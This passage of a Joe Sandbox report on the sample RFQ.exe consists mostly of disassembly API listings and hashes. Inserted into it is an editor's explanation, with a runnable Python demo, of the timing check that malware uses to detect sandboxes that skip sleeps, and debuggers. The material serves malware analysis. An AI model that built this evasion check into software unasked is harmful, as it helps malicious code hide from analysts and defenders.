                                                                            • Instruction ID: 830d501d12352e1767cd96a0f75ff936f4b44e71ef6ed11105e7378d16b6189b
                                                                            • Opcode Fuzzy Hash: 15a09b91dd8a20d637462cd68d29517d4c82738128d9c5feb98d318f7ac13026
                                                                            • Instruction Fuzzy Hash: C9117C70C4166CEBCF009FE9D9487EFBB79BF19711F108099D851B2280CB346A419B95
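The function above is the QueryPerformanceCounter / Sleep / QueryPerformanceCounter idiom that the report's "execution timing" signature keys on: take a high-resolution timestamp, sleep, take another, and compare the measured gap with the requested one (the listed first argument to Sleep here is 0, and since RFQ.exe is a compiled AutoIt script this is most likely the AutoIt runtime's own timer code rather than FormBook-specific logic; that is this editor's assessment, not a report finding). The following is an added illustration of how such a check classifies a host, written by the editor and not code from the sample or from Joe Sandbox. It uses time.perf_counter and time.sleep as portable stand-ins for the two Windows APIs, and the thresholds and the fake sleep-skipping hook are assumptions chosen for the demo.

```python
"""Execution-timing check of the QPC / Sleep / QPC kind, with portable stand-ins.

A real host sleeps for roughly the requested time.  A sandbox that patches
Sleep to return immediately ("sleep skipping") produces a gap far shorter than
requested; a single-stepping debugger produces one far longer.  Malware uses
the verdict to decide whether to run its payload; analysts use the same idiom
to confirm that a sandbox's time acceleration is consistent across all clocks.
"""
import time
from typing import Callable, Optional, Tuple

NORMAL, SKIPPED, STALLED = "normal", "sleep_skipped", "stalled"


def timing_verdict(requested_ms: float, elapsed_ms: float,
                   low: float = 0.5, high: float = 10.0) -> str:
    """Classify one measured sleep.  The ratios are demo assumptions."""
    if elapsed_ms < requested_ms * low:
        return SKIPPED        # returned far too fast: Sleep was hooked/skipped
    if elapsed_ms > requested_ms * high:
        return STALLED        # far too slow: stepping, breakpoints, heavy hooks
    return NORMAL


def check_sleep(requested_ms: float,
                sleep: Callable[[float], None] = time.sleep,
                clock: Callable[[], float] = time.perf_counter
                ) -> Tuple[str, float]:
    """The idiom itself: timestamp, sleep, timestamp; returns (verdict, elapsed_ms).

    On Windows the two calls would be QueryPerformanceCounter and Sleep; here
    perf_counter/sleep stand in so the check runs anywhere.
    """
    t0 = clock()
    sleep(requested_ms / 1000.0)
    elapsed_ms = (clock() - t0) * 1000.0
    return timing_verdict(requested_ms, elapsed_ms), elapsed_ms


def fake_skipping_sleep(_seconds: float) -> None:
    """Assumed model of a sandbox hook that makes Sleep return at once."""
    return None


def make_stalled_clock(extra_ms: float) -> Callable[[], float]:
    """Assumed model of a clock seen by a process that is being single-stepped:
    every read advances by extra_ms more than real time."""
    state: dict = {"offset": 0.0}

    def clock() -> float:
        state["offset"] += extra_ms / 1000.0
        return time.perf_counter() + state["offset"]
    return clock


if __name__ == "__main__":
    print("real sleep:      ", check_sleep(100))
    print("skipped sleep:   ", check_sleep(100, sleep=fake_skipping_sleep))
    print("stepped process: ", check_sleep(10, clock=make_stalled_clock(500)))
```

A sandbox that only hooks Sleep but leaves QueryPerformanceCounter untouched is caught by the SKIPPED branch; one that also advances the performance counter by the skipped amount passes the check, which is why Joe Sandbox reports this idiom rather than silently skipping sleeps.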
                                                                            APIs
                                                                            • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 006E2D09
                                                                            • GetWindowThreadProcessId.USER32(?,00000000), ref: 006E2D1A
                                                                            • GetCurrentThreadId.KERNEL32 ref: 006E2D21
                                                                            • AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 006E2D28
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
• Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                                            • String ID:
                                                                            • API String ID: 2710830443-0
                                                                            • Opcode ID: 0c1f4dd61bfc14c9708ec744e57dadb97cd90c4d35c6d4edd5c0dbf04fe7975d
                                                                            • Instruction ID: 061c620e5ba492feeabed1b09ec409dfe8f65f348d71d09b79f84e90da84f5a6
                                                                            • Opcode Fuzzy Hash: 0c1f4dd61bfc14c9708ec744e57dadb97cd90c4d35c6d4edd5c0dbf04fe7975d
                                                                            • Instruction Fuzzy Hash: 3EE09B7158132876D72117B79C0EEE73E2EEF46B61F108015F205D10D0D694C841C1B0
                                                                            APIs
                                                                              • Part of subcall function 0069AABF: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 0069AB19
                                                                              • Part of subcall function 0069AABF: SelectObject.GDI32(?,00000000), ref: 0069AB28
                                                                              • Part of subcall function 0069AABF: BeginPath.GDI32(?), ref: 0069AB3F
                                                                              • Part of subcall function 0069AABF: SelectObject.GDI32(?,00000000), ref: 0069AB68
                                                                            • MoveToEx.GDI32(?,00000000,00000000,00000000), ref: 00718779
                                                                            • LineTo.GDI32(?,?,?), ref: 00718786
                                                                            • EndPath.GDI32(?), ref: 00718796
                                                                            • StrokePath.GDI32(?), ref: 007187A4
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
• Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                                                            • String ID:
                                                                            • API String ID: 1539411459-0
                                                                            • Opcode ID: 80b6a2fc30321becf5c174bd70c57b5cd99a35851748c7fbaf048fb326da4a2e
                                                                            • Instruction ID: 2b691452aa1da31e4c70658582f4f25656c6a0e900b5d1afd981ae0fabf392dd
                                                                            • Opcode Fuzzy Hash: 80b6a2fc30321becf5c174bd70c57b5cd99a35851748c7fbaf048fb326da4a2e
                                                                            • Instruction Fuzzy Hash: 82F03A32081298BADB135FD8AC09FCE3B59AF0A711F18C100FA11650E1C7B95551DBEA
                                                                            APIs
                                                                            • GetSysColor.USER32(00000008), ref: 0069AD4C
                                                                            • SetTextColor.GDI32(?,?), ref: 0069AD56
                                                                            • SetBkMode.GDI32(?,00000001), ref: 0069AD69
                                                                            • GetStockObject.GDI32(00000005), ref: 0069AD71
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
• Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: Color$ModeObjectStockText
                                                                            • String ID:
                                                                            • API String ID: 4037423528-0
                                                                            • Opcode ID: 49a68fbef98372cbbfb2b822898b025f53b09dfa45dc5f5bb21c4e16859878a2
                                                                            • Instruction ID: 9ecc5104deade24c4f3d82d614ef6af72de372eed8346269fcfdcac7b524d024
                                                                            • Opcode Fuzzy Hash: 49a68fbef98372cbbfb2b822898b025f53b09dfa45dc5f5bb21c4e16859878a2
                                                                            • Instruction Fuzzy Hash: E3E092316C4284BEDB225BB8AC09BD83B62EF12336F14C31AF6FA481E1C3755940AB11
                                                                            APIs
                                                                            • GetCurrentThread.KERNEL32 ref: 006E1578
                                                                            • OpenThreadToken.ADVAPI32(00000000,?,?,?,006E111D), ref: 006E157F
                                                                            • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,006E111D), ref: 006E158C
                                                                            • OpenProcessToken.ADVAPI32(00000000,?,?,?,006E111D), ref: 006E1593
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
• Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: CurrentOpenProcessThreadToken
                                                                            • String ID:
                                                                            • API String ID: 3974789173-0
                                                                            • Opcode ID: 16799760002d5d651042572be89649b3f4971b55ca0d792588992778826da9fb
                                                                            • Instruction ID: 94cdfd55d3b1fb9ac96c3032333d3c078101905e7f89fbadfc3023e8272dbd01
                                                                            • Opcode Fuzzy Hash: 16799760002d5d651042572be89649b3f4971b55ca0d792588992778826da9fb
                                                                            • Instruction Fuzzy Hash: FCE04FB16823119BD6201BF5AD0CBD63F69AF49792F10C404A246CD0D0D67884408755
                                                                            APIs
                                                                            • GetDesktopWindow.USER32 ref: 006DE008
                                                                            • GetDC.USER32(00000000), ref: 006DE012
                                                                            • GetDeviceCaps.GDI32(00000000,0000000C), ref: 006DE01E
                                                                            • ReleaseDC.USER32(?), ref: 006DE03F
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
• Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: CapsDesktopDeviceReleaseWindow
                                                                            • String ID:
                                                                            • API String ID: 2889604237-0
                                                                            • Opcode ID: b62355c061c9194d27187f2dc4d3dfa3da8946a3141645abe1c0d8f5ab2d47ff
                                                                            • Instruction ID: c4af8031a418f21c28eadc32763ccdf046841be4bb1b61c8ef11832e01647d8e
                                                                            • Opcode Fuzzy Hash: b62355c061c9194d27187f2dc4d3dfa3da8946a3141645abe1c0d8f5ab2d47ff
                                                                            • Instruction Fuzzy Hash: 01E09AB5840214DFCF529FE8D848AADBBB6AB08711B10C459E949E7290C73D5A41DF54
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
• Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: LoadString
                                                                            • String ID: @COM_EVENTOBJ$Qdn
                                                                            • API String ID: 2948472770-1502889352
                                                                            • Opcode ID: ed553573d6a94428410203fbfdf3fec6bdcda65e340c4f1f849d7a52fd73c353
                                                                            • Instruction ID: 565772530c45d848bb865c55b49c5de17f03de9aa8cde06ea3e8a27a97052e74
                                                                            • Opcode Fuzzy Hash: ed553573d6a94428410203fbfdf3fec6bdcda65e340c4f1f849d7a52fd73c353
                                                                            • Instruction Fuzzy Hash: 69F18C709083028FD725DF14C851B6AB7E2BFA4304F14892EF48A9B3A1D775ED46CB86
                                                                            APIs
                                                                              • Part of subcall function 00688FA0: _wcslen.LIBCMT ref: 00688FA5
                                                                            • WNetUseConnectionW.MPR(00000000,?,0000002A,00000000,?,?,0000002A,?), ref: 006F4DF2
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
• Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: Connection_wcslen
                                                                            • String ID: *$LPT
                                                                            • API String ID: 1725874428-3443410124
                                                                            • Opcode ID: 9a55b9c87e4463bfd266f309d95a8acd28a125b9918f1a0e76562dfddbcd88fc
                                                                            • Instruction ID: a55e6491d93dca28e60139049e1ce082ac648346ff9826e97af783b77e811cd3
                                                                            • Opcode Fuzzy Hash: 9a55b9c87e4463bfd266f309d95a8acd28a125b9918f1a0e76562dfddbcd88fc
                                                                            • Instruction Fuzzy Hash: DC916F75A002089FCB14DF54C484EBABBF2BF84304F558099E90A9F762CB75EE86CB51
                                                                            APIs
                                                                            • __startOneArgErrorHandling.LIBCMT ref: 006AE29D
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
• Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorHandling__start
                                                                            • String ID: pow
                                                                            • API String ID: 3213639722-2276729525
                                                                            • Opcode ID: 433947ba52d5cb256ecf45e80192a5ae3cdc68472b1f8552e9242b2da81d574e
                                                                            • Instruction ID: 9d268eebd1498e072da25869cae58eeb84a9cd07c1ed28ef1832674c91183db8
                                                                            • Opcode Fuzzy Hash: 433947ba52d5cb256ecf45e80192a5ae3cdc68472b1f8552e9242b2da81d574e
                                                                            • Instruction Fuzzy Hash: 08515DA1A0C5059ADB117724C9023F93BAAAF81740F308D9DE095423A9DB36CDD39F8A
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
• Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: #
                                                                            • API String ID: 0-1885708031
                                                                            • Opcode ID: abc17b4c16bf4050562bb2f02db7f7f0416c2320af3b7545d1a551bfc5ba8496
                                                                            • Instruction ID: 5977199a17cc95cb7b71c8964796a2374ca9d81c9b31f2ed6a0a8123f077a1e5
                                                                            • Opcode Fuzzy Hash: abc17b4c16bf4050562bb2f02db7f7f0416c2320af3b7545d1a551bfc5ba8496
                                                                            • Instruction Fuzzy Hash: 7151EF7154424B9EDF15AF29C4A0AFA7BB2EF16310F24415EECA29B3D0DA749D42CB60
                                                                            APIs
                                                                            • Sleep.KERNEL32(00000000), ref: 0069F381
                                                                            • GlobalMemoryStatusEx.KERNEL32(?), ref: 0069F39A
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
• Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: GlobalMemorySleepStatus
                                                                            • String ID: @
                                                                            • API String ID: 2783356886-2766056989
                                                                            • Opcode ID: df86b00593b7c49a80d9721477ec1e38f8a7f53f46de899018d0daabd8aec82e
                                                                            • Instruction ID: 381ab707ecbc18a056bb56a4cbaddaf347adc328f6d84db0abc74edb4d0abbe9
                                                                            • Opcode Fuzzy Hash: df86b00593b7c49a80d9721477ec1e38f8a7f53f46de899018d0daabd8aec82e
                                                                            • Instruction Fuzzy Hash: 3D5148714187489BE360AF50D886BAFBBE8FF85340F81895DF1D951191DB318829CB6B
                                                                            APIs
                                                                            • _wcslen.LIBCMT ref: 006FD04E
                                                                            • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 006FD058
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: CrackInternet_wcslen
                                                                            • String ID: |
                                                                            • API String ID: 596671847-2343686810
                                                                            • Opcode ID: 7cb6d8a58db17621d677e35c4415b26ff3fd9a6fb3ce3692b8803ee21c87eb54
                                                                            • Instruction ID: 3f85ecb65c2e6d26d7f7fbbb338aae78013aff91161427c43b4d7c89a090f9da
                                                                            • Opcode Fuzzy Hash: 7cb6d8a58db17621d677e35c4415b26ff3fd9a6fb3ce3692b8803ee21c87eb54
                                                                            • Instruction Fuzzy Hash: 46315B71800109AFCF41EFA4CC85AEEBFBAFF04300F004129F925A7266DB319A56CB60
                                                                            APIs
                                                                            • DestroyWindow.USER32(?,?,?,?), ref: 00713554
                                                                            • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 0071358F
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: Window$DestroyMove
                                                                            • String ID: static
                                                                            • API String ID: 2139405536-2160076837
                                                                            • Opcode ID: 7fe4ac0b2486431446f4196f0a84780891a449f052963a9717e5ab833044c06d
                                                                            • Instruction ID: 3d51e9707a16b95e4d0120f1e185f823a0a5461ecfa7009fc432416cea452d9b
                                                                            • Opcode Fuzzy Hash: 7fe4ac0b2486431446f4196f0a84780891a449f052963a9717e5ab833044c06d
                                                                            • Instruction Fuzzy Hash: 69319E71100604AADB21DF78CC80AFB73BAFF48720F10861DF9A987180DA38ED91CB64
                                                                            APIs
                                                                            • SendMessageW.USER32(?,00001132,00000000,?), ref: 00714554
                                                                            • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00714569
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend
                                                                            • String ID: '
                                                                            • API String ID: 3850602802-1997036262
                                                                            • Opcode ID: 8e989b88bbee9692ed9dddc70e663c76a3f421c96fb41c2ec16f2874443e7f41
                                                                            • Instruction ID: 50a59c01bf9ab55039adc0e6a66c993a3c9fd533d15308559c6aac0d3f1d6e45
                                                                            • Opcode Fuzzy Hash: 8e989b88bbee9692ed9dddc70e663c76a3f421c96fb41c2ec16f2874443e7f41
                                                                            • Instruction Fuzzy Hash: 2F314A75A0030A9FDB14CFA9C890BDA7BB6FF08300F10416AE904AB391D774E991CF90
                                                                            APIs
                                                                              • Part of subcall function 006A01C2: EnterCriticalSection.KERNEL32(0075070C,?,?,?,00691744,00752580,?,?,?), ref: 006A01CD
                                                                              • Part of subcall function 006A01C2: LeaveCriticalSection.KERNEL32(0075070C,?,00691744,00752580,?,?,?), ref: 006A020A
                                                                              • Part of subcall function 0068B606: _wcslen.LIBCMT ref: 0068B610
                                                                              • Part of subcall function 006A0023: __onexit.LIBCMT ref: 006A0029
                                                                            • __Init_thread_footer.LIBCMT ref: 00707B22
                                                                              • Part of subcall function 006A0178: EnterCriticalSection.KERNEL32(0075070C,?,?,006D556E,00752540,?,?,?,?,?), ref: 006A0182
                                                                              • Part of subcall function 006A0178: LeaveCriticalSection.KERNEL32(0075070C,?,006D556E,00752540,?,?,?,?,?), ref: 006A01B5
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: CriticalSection$EnterLeave$Init_thread_footer__onexit_wcslen
                                                                            • String ID: Qdn$Variable must be of type 'Object'.
                                                                            • API String ID: 535116098-568107439
                                                                            • Opcode ID: d7913aa5833a6b5dd8ecd270416c8f29457b1166171bf460272b673e20666092
                                                                            • Instruction ID: a102887d058909483ece4becda1df4161233c94ebe83515b0fb2aed54dbfa3de
                                                                            • Opcode Fuzzy Hash: d7913aa5833a6b5dd8ecd270416c8f29457b1166171bf460272b673e20666092
                                                                            • Instruction Fuzzy Hash: AD31AC74A08204DFDB48EF54D891AAD7BF2AF09304F50815DE8055B3D2EBB9EE82CB55
                                                                            APIs
                                                                            • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 007131AF
                                                                            • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 007131BA
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend
                                                                            • String ID: Combobox
                                                                            • API String ID: 3850602802-2096851135
                                                                            • Opcode ID: 695aeacf61ace3542da2bb2356519de282b3e3def1e2bb4ccd4635e8438dcd3b
                                                                            • Instruction ID: 04629108ec4167637e8416d723ef3c40b76726d882bd35bd40945ea01d867640
                                                                            • Opcode Fuzzy Hash: 695aeacf61ace3542da2bb2356519de282b3e3def1e2bb4ccd4635e8438dcd3b
                                                                            • Instruction Fuzzy Hash: 70118E7120060C7FEF259E58CC80EEB376BEB493A4F104129F9189B2D0D679AD9197A0
                                                                            APIs
                                                                              • Part of subcall function 006879B6: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 006879F4
                                                                              • Part of subcall function 006879B6: GetStockObject.GDI32(00000011), ref: 00687A08
                                                                              • Part of subcall function 006879B6: SendMessageW.USER32(00000000,00000030,00000000), ref: 00687A12
                                                                            • GetWindowRect.USER32(00000000,?), ref: 007136AD
                                                                            • GetSysColor.USER32(00000012), ref: 007136C7
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                                            • String ID: static
                                                                            • API String ID: 1983116058-2160076837
                                                                            • Opcode ID: 395ddccf4ced43935f3d61c388ad893cd0cb4b131c26724ef31f965b1d41427c
                                                                            • Instruction ID: bb97520abb88d7d57645e8cc360216717316174485e4f8a10c89d3f22143836d
                                                                            • Opcode Fuzzy Hash: 395ddccf4ced43935f3d61c388ad893cd0cb4b131c26724ef31f965b1d41427c
                                                                            • Instruction Fuzzy Hash: 54112672610209AFDB01DFA8CC45AEA7BA8EB08354F104624F956E2290E679E890DB60
                                                                            APIs
